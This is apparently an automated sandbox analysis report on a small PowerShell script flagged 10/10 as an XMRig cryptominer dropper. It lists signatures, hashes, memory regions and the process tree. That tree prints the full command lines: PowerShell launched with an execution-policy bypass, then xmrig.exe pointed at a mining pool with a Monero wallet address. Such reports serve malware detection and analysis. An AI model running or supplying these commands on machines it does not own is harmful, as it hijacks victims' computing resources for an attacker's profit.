Resubmissions

27-05-2024 18:28

240527-w4c4xsdc7w 10

27-05-2024 18:28

240527-w4c4xsdc7v 10

27-05-2024 18:28

240527-w4cs6aed49 10

27-05-2024 18:28

240527-w4cs6aed48 10

27-05-2024 18:28

240527-w4cs6aed47 10

27-05-2024 18:28

240527-w4c4xsed52

Analysis

  • max time kernel
    1800s
  • max time network
    1772s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240508-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
  • submitted
    25-05-2024 01:30

General

  • Target

    file01 - copia (7).ps1

  • Size

    510B

  • MD5

    2dcb4d51653aec1a829f3232d69f5e12

  • SHA1

    dd096e7d800b9f3ca0edc64955b4464d71789f80

  • SHA256

    d1902d3e519d0d87097fd8969280bd01bd139a5191faadaed0149e61b4a7495c

  • SHA512

    7def3731bbb3f7ac3895edcf14c645bbcc0608f09c6b03bf7ddaebf049f1f6f1aad4086548ab9fce7b2bbefd837de8377f8b81cf94022d84e35f1bba0af89143

Score
10/10

Malware Config

Signatures

  • XMRig Miner payload 64 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Blocklisted process makes network request 2 IoCs
  • Executes dropped EXE 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of WriteProcessMemory 2 IoCs

Processes

  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"
    1⤵
    • Blocklisted process makes network request
    • Command and Scripting Interpreter: PowerShell
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:3628
    • C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
      "C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
      2⤵
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of FindShellTrayWindow
      PID:2640

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_b5ghntqy.sl4.ps1
    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
    Filesize

    9.1MB

    MD5

    205ad9eb6acd6f58752899669b69fe74

    SHA1

    bedb78ac5034259b86c2cbc915de2e861e8d7604

    SHA256

    2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda

    SHA512

    28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

  • memory/2640-78-0x00007FF612650000-0x00007FF613283000-memory.dmp
    Filesize

    12.2MB

  • memory/2640-73-0x00007FF612650000-0x00007FF613283000-memory.dmp
    Filesize

    12.2MB

  • memory/2640-49-0x00007FF612650000-0x00007FF613283000-memory.dmp
    Filesize

    12.2MB

  • memory/2640-118-0x00007FF612650000-0x00007FF613283000-memory.dmp
    Filesize

    12.2MB

  • memory/2640-117-0x00007FF612650000-0x00007FF613283000-memory.dmp
    Filesize

    12.2MB

  • memory/2640-116-0x00007FF612650000-0x00007FF613283000-memory.dmp
    Filesize

    12.2MB

  • memory/2640-50-0x00000170B64D0000-0x00000170B64F0000-memory.dmp
    Filesize

    128KB

  • memory/2640-115-0x00007FF612650000-0x00007FF613283000-memory.dmp
    Filesize

    12.2MB

  • memory/2640-114-0x00007FF612650000-0x00007FF613283000-memory.dmp
    Filesize

    12.2MB

  • memory/2640-113-0x00007FF612650000-0x00007FF613283000-memory.dmp
    Filesize

    12.2MB

  • memory/2640-112-0x00007FF612650000-0x00007FF613283000-memory.dmp
    Filesize

    12.2MB

  • memory/2640-47-0x00000170B6450000-0x00000170B6470000-memory.dmp
    Filesize

    128KB

  • memory/2640-111-0x00007FF612650000-0x00007FF613283000-memory.dmp
    Filesize

    12.2MB

  • memory/2640-53-0x00000170B64F0000-0x00000170B6510000-memory.dmp
    Filesize

    128KB

  • memory/2640-54-0x00007FF612650000-0x00007FF613283000-memory.dmp
    Filesize

    12.2MB

  • memory/2640-110-0x00007FF612650000-0x00007FF613283000-memory.dmp
    Filesize

    12.2MB

  • memory/2640-56-0x00007FF612650000-0x00007FF613283000-memory.dmp
    Filesize

    12.2MB

  • memory/2640-58-0x00000170B64D0000-0x00000170B64F0000-memory.dmp
    Filesize

    128KB

  • memory/2640-57-0x00007FF612650000-0x00007FF613283000-memory.dmp
    Filesize

    12.2MB

  • memory/2640-59-0x00000170B64F0000-0x00000170B6510000-memory.dmp
    Filesize

    128KB

  • memory/2640-60-0x00007FF612650000-0x00007FF613283000-memory.dmp
    Filesize

    12.2MB

  • memory/2640-61-0x00007FF612650000-0x00007FF613283000-memory.dmp
    Filesize

    12.2MB

  • memory/2640-62-0x00007FF612650000-0x00007FF613283000-memory.dmp
    Filesize

    12.2MB

  • memory/2640-63-0x00007FF612650000-0x00007FF613283000-memory.dmp
    Filesize

    12.2MB

  • memory/2640-64-0x00007FF612650000-0x00007FF613283000-memory.dmp
    Filesize

    12.2MB

  • memory/2640-65-0x00007FF612650000-0x00007FF613283000-memory.dmp
    Filesize

    12.2MB

  • memory/2640-66-0x00007FF612650000-0x00007FF613283000-memory.dmp
    Filesize

    12.2MB

  • memory/2640-67-0x00007FF612650000-0x00007FF613283000-memory.dmp
    Filesize

    12.2MB

  • memory/2640-68-0x00007FF612650000-0x00007FF613283000-memory.dmp
    Filesize

    12.2MB

  • memory/2640-69-0x00007FF612650000-0x00007FF613283000-memory.dmp
    Filesize

    12.2MB

  • memory/2640-70-0x00007FF612650000-0x00007FF613283000-memory.dmp
    Filesize

    12.2MB

  • memory/2640-71-0x00007FF612650000-0x00007FF613283000-memory.dmp
    Filesize

    12.2MB

  • memory/2640-72-0x00007FF612650000-0x00007FF613283000-memory.dmp
    Filesize

    12.2MB

  • memory/2640-80-0x00007FF612650000-0x00007FF613283000-memory.dmp
    Filesize

    12.2MB

  • memory/2640-74-0x00007FF612650000-0x00007FF613283000-memory.dmp
    Filesize

    12.2MB

  • memory/2640-75-0x00007FF612650000-0x00007FF613283000-memory.dmp
    Filesize

    12.2MB

  • memory/2640-76-0x00007FF612650000-0x00007FF613283000-memory.dmp
    Filesize

    12.2MB

  • memory/2640-77-0x00007FF612650000-0x00007FF613283000-memory.dmp
    Filesize

    12.2MB

  • memory/2640-109-0x00007FF612650000-0x00007FF613283000-memory.dmp
    Filesize

    12.2MB

  • memory/2640-107-0x00007FF612650000-0x00007FF613283000-memory.dmp
    Filesize

    12.2MB

  • memory/2640-48-0x00000170B64A0000-0x00000170B64C0000-memory.dmp
    Filesize

    128KB

  • memory/2640-81-0x00007FF612650000-0x00007FF613283000-memory.dmp
    Filesize

    12.2MB

  • memory/2640-82-0x00007FF612650000-0x00007FF613283000-memory.dmp
    Filesize

    12.2MB

  • memory/2640-83-0x00007FF612650000-0x00007FF613283000-memory.dmp
    Filesize

    12.2MB

  • memory/2640-84-0x00007FF612650000-0x00007FF613283000-memory.dmp
    Filesize

    12.2MB

  • memory/2640-85-0x00007FF612650000-0x00007FF613283000-memory.dmp
    Filesize

    12.2MB

  • memory/2640-86-0x00007FF612650000-0x00007FF613283000-memory.dmp
    Filesize

    12.2MB

  • memory/2640-87-0x00007FF612650000-0x00007FF613283000-memory.dmp
    Filesize

    12.2MB

  • memory/2640-88-0x00007FF612650000-0x00007FF613283000-memory.dmp
    Filesize

    12.2MB

  • memory/2640-89-0x00007FF612650000-0x00007FF613283000-memory.dmp
    Filesize

    12.2MB

  • memory/2640-90-0x00007FF612650000-0x00007FF613283000-memory.dmp
    Filesize

    12.2MB

  • memory/2640-91-0x00007FF612650000-0x00007FF613283000-memory.dmp
    Filesize

    12.2MB

  • memory/2640-92-0x00007FF612650000-0x00007FF613283000-memory.dmp
    Filesize

    12.2MB

  • memory/2640-93-0x00007FF612650000-0x00007FF613283000-memory.dmp
    Filesize

    12.2MB

  • memory/2640-94-0x00007FF612650000-0x00007FF613283000-memory.dmp
    Filesize

    12.2MB

  • memory/2640-95-0x00007FF612650000-0x00007FF613283000-memory.dmp
    Filesize

    12.2MB

  • memory/2640-96-0x00007FF612650000-0x00007FF613283000-memory.dmp
    Filesize

    12.2MB

  • memory/2640-97-0x00007FF612650000-0x00007FF613283000-memory.dmp
    Filesize

    12.2MB

  • memory/2640-98-0x00007FF612650000-0x00007FF613283000-memory.dmp
    Filesize

    12.2MB

  • memory/2640-99-0x00007FF612650000-0x00007FF613283000-memory.dmp
    Filesize

    12.2MB

  • memory/2640-100-0x00007FF612650000-0x00007FF613283000-memory.dmp
    Filesize

    12.2MB

  • memory/2640-101-0x00007FF612650000-0x00007FF613283000-memory.dmp
    Filesize

    12.2MB

  • memory/2640-102-0x00007FF612650000-0x00007FF613283000-memory.dmp
    Filesize

    12.2MB

  • memory/2640-103-0x00007FF612650000-0x00007FF613283000-memory.dmp
    Filesize

    12.2MB

  • memory/2640-104-0x00007FF612650000-0x00007FF613283000-memory.dmp
    Filesize

    12.2MB

  • memory/2640-105-0x00007FF612650000-0x00007FF613283000-memory.dmp
    Filesize

    12.2MB

  • memory/2640-106-0x00007FF612650000-0x00007FF613283000-memory.dmp
    Filesize

    12.2MB

  • memory/2640-79-0x00007FF612650000-0x00007FF613283000-memory.dmp
    Filesize

    12.2MB

  • memory/2640-108-0x00007FF612650000-0x00007FF613283000-memory.dmp
    Filesize

    12.2MB

  • memory/3628-51-0x00007FFA19893000-0x00007FFA19895000-memory.dmp
    Filesize

    8KB

  • memory/3628-55-0x00007FFA19890000-0x00007FFA1A351000-memory.dmp
    Filesize

    10.8MB

  • memory/3628-52-0x00007FFA19890000-0x00007FFA1A351000-memory.dmp
    Filesize

    10.8MB

  • memory/3628-16-0x00000253CB770000-0x00000253CB77A000-memory.dmp
    Filesize

    40KB

  • memory/3628-15-0x00000253CBB20000-0x00000253CBB32000-memory.dmp
    Filesize

    72KB

  • memory/3628-14-0x00007FFA19890000-0x00007FFA1A351000-memory.dmp
    Filesize

    10.8MB

  • memory/3628-12-0x00007FFA19890000-0x00007FFA1A351000-memory.dmp
    Filesize

    10.8MB

  • memory/3628-11-0x00007FFA19890000-0x00007FFA1A351000-memory.dmp
    Filesize

    10.8MB

  • memory/3628-1-0x00000253CB5F0000-0x00000253CB612000-memory.dmp
    Filesize

    136KB

  • memory/3628-0-0x00007FFA19893000-0x00007FFA19895000-memory.dmp
    Filesize

    8KB